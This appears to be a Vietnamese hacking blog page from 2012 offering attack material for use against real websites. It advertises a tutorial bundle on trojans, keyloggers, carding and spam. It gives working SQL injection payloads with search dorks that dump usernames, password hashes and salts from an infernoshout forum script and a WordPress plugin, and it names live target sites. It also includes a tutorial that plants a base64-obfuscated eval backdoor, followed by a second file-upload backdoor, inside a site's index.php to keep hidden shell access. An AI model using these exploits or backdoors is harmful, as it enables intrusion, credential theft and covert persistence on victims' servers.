12 thg 9, 2012
Attacker Helper
Chức năng:• hướng dẫn sendmail nặc danh với Anonym Mailer 2.0
• hướng dẫn sử dụng phần mềm aiepr
• hướng dẫn sử dụng trojan barok
• hướng dẫn sử dụng phần mềm revelation
• hướng dẫn sử dụng keylogger 5.04
• hướng dẫn sử dụng bommail demo
• hướng dẫn sử dụng chương trinh hdkp4
• hướng dẫn sủe dụng các chương trinh nuke
• hướng dẫn sử dụng chương trinh ShowPass
• hướng dẫn sử dụng chương trinh smurf2k
• hướng dẫn sử dụng phần mềm Stealther để dấu IP
• hướng dẫn hack tất cả các webmail bằng fakelogin
• hướng dẫn xài công cụ Essential NetTools để lấy account chùa
• hack credit card qua lỗi acart2_0
• hack credit card qua lỗi SalesCart Database Storage Insecurity
• hack credit card qua lỗi VP-ASP
• hack credit card qua lỗi trong file shopper.cgi
• hack credit card của Cart32 Sites
• một bài viết về cvv2
• hack server NT qua 1 số lỗi đã cũ
• khai thác lỗi hosting controller (HC)
• linux shell utils (by Microsoftvn)
• exploit for the "unbreakable" oracle database (by Microsoftvn)
• hack 1 hệ thống CisCo linux (by Microsoftvn)
• tự setup 1 cgiproxy riêng cho minh
• sơ qua về tấn công từ chối dịch vụ
• tổng hợp các lệnh của mIRC
• hướng dẫn làm một freedback form
• một vài link Free Sub Domain And Hosting
• Thư Viện Sách
• Welcome Việt Nam
• Cơ bản Cron trên Unix ( by Vicki )
• 3 bước kiểm tra Card
• Hướng dẫn sử dụng NetCat
• Làm thế nào để Spam ? ( by Vicki Group )
• Bài viết tổng hợp về Hack của Squall Leonahart
• Tìm hiểu về SQL Injection ( by Vicki Group )
• Tìm hiểu về tràn ngăn xếp trên Windows ( by Vicki Group )
• Bài viết thoả hiệp Vnexpress của VKDT ( by Vicki Group )
• Hack anon@FTP ( by Kha Administrator Việt Hacker )
• Chạy File từ WebSite hay Email ( IE5.5, Win 2000 )
• Hack IIS server với bug unicode
• Format hard disk bằng email
• Mask Link
• Trojan chạy ngay sau khi mở email
• Hack Apache server với bug phf , và một số Bug khác
• Gửi thư nặc danh, bomb thử bằng Telnet
• Xâm nhập máy tính khi đang Online
• Hướng dẫn Hack Local Site ( by Lukos )
• Cross Site Scripting ( by Binhnx )
• Hướng dẫn Deface 1 Website
• Một số phương pháp Hack Email ( by Staff of HVA )
• Các kiểu tấn công hiện đại của Hacker ( by Staff of HVA )
• Những hiểu biết cở bản để trở thành Hacker ( by Staff of HVA )
http://www.mediafire.com/?m3jiz69bd7nvgkd Xem chi tiết »
HTML Learning v1.0
Chương trình dựa theo phần Try It của w3schoolshttp://www.w3schools.com/html/tryit....=tryhtml_introGiao diện chương trình:

Download: http://www.mediafire.com/?f2kcc7z4b8zikkr
Code by: msconfig - VHB Xem chi tiết »
2 thg 9, 2012
[New bug] sqli INURL:infernoshout.php
1.Sử dụng dork trên googleINURL:infernoshout.php
2. Exploit link: infernoshout.php?do=options&area=commands
3. Ném vào phần input dòng bên dưới còn output điền gì cũng đc.

COMMAND INPUT :
Code:
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#Đã thử vài site không chơi đc kiểu này

demo: http://sinhvienphuyen.vn/forum/infernoshout.php
www.saigoncdclub.com/forum/infernoshout.php Xem chi tiết »
WordPress PhotoRacer Plugin(Attachment) SQL Exploit
Hi aLL ! I am OrucReis 
Coder ; OrucReis
Country ; TURKEY
I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...
Dork ; inurl:"mostvoted.php?pid="
Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users
OR ;
Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users
Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/
MD5 Crack;
http://hashchecker.de
http://md5cracker.org

Coder ; OrucReis
Country ; TURKEY
I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...
Dork ; inurl:"mostvoted.php?pid="
Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users
OR ;
Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users
Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/
MD5 Crack;
http://hashchecker.de
http://md5cracker.org
__________________
Xem chi tiết »
30 thg 8, 2012
26 thg 8, 2012
Tut giấu shell
Mọi người thấy hay thì cho em tí tín dụng để vào Family nhé
Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.
Vậy giấu shell làm sao để admin khó biết ?
Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...
Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng

Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:
Code:
eval(base64_decode("Pz48P3BocCBpZihpc3NldCgkX0dFVFsiYWN0Il0pICYmICRfR0VUWyJhY3QiXT09InNvaWRhaWthIil7CgppZihpc3NldCgkX0ZJTEVTWyJGaWxlIl0pKQp7CiRQYXRoPWV4cGxvZGUoIi8iLF9fRklMRV9fKTsKdW5zZXQoJFBhdGhbY291bnQoJFBhdGgpLTFdKTsKJFBhdGg9aW1wbG9kZSgiLyIsJFBhdGgpOwokUGF0aC49Ii8iLiRfRklMRVNbIkZpbGUiXVsibmFtZSJdOwoJaWYgKCRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSA+IDApCgl7CgllY2hvICJFcnJvcjogIiAuICRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOwoJfQoJZWxzZSBpZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siRmlsZSJdWyJ0bXBfbmFtZSJdLCRQYXRoKSkKCXsKCWVjaG8gIlN0b3JlZCBpbjogIiAuJFBhdGg7Cgl9Cn0KPz4KPGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCTxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJGaWxlIi8+PGlucHV0IHR5cGU9InN1Ym1pdCIvPgo8L2Zvcm0+Cjxici8+CkNvZGVkIGJ5IExlb3JpdXMKPD9waHAKZXhpdDsKfQo/Pjw/"));
Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika
========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó
if($_GET['id']=='hk')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
index.php?id=hk
[TUT] Up Shell không cần quyền admin (quyền User)
Tut này đơn giản thôi, các pro nào biết rồi thì chém nhẹ tay thôi nhé!http://www.mediafire.com/?e615wih8v6c18f8
Khi nào em rảnh em sẽ up lên Youtube cho mọi người dễ xem

Bấm nút thanks để em có tinh thần viết tiếp nha

TUT BY
| h6009 |
VHB Xem chi tiết »





![[Magazine] The Hacker News Tháng 8 - 2012](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjimH2EV2wt7WcvQZB0r-PT6UBpsyAY9VvqAd5_3Oys02yK4KsZCdocaw6A05kZlfT5LnIxdbK4ZebRcpb_jO9fFa8Xch7H4PMqR0bjobeL8gu3bf3Ukuv9rFY9bikMED-ftAZW_1dbyYQ/s72-c/63.jpg)
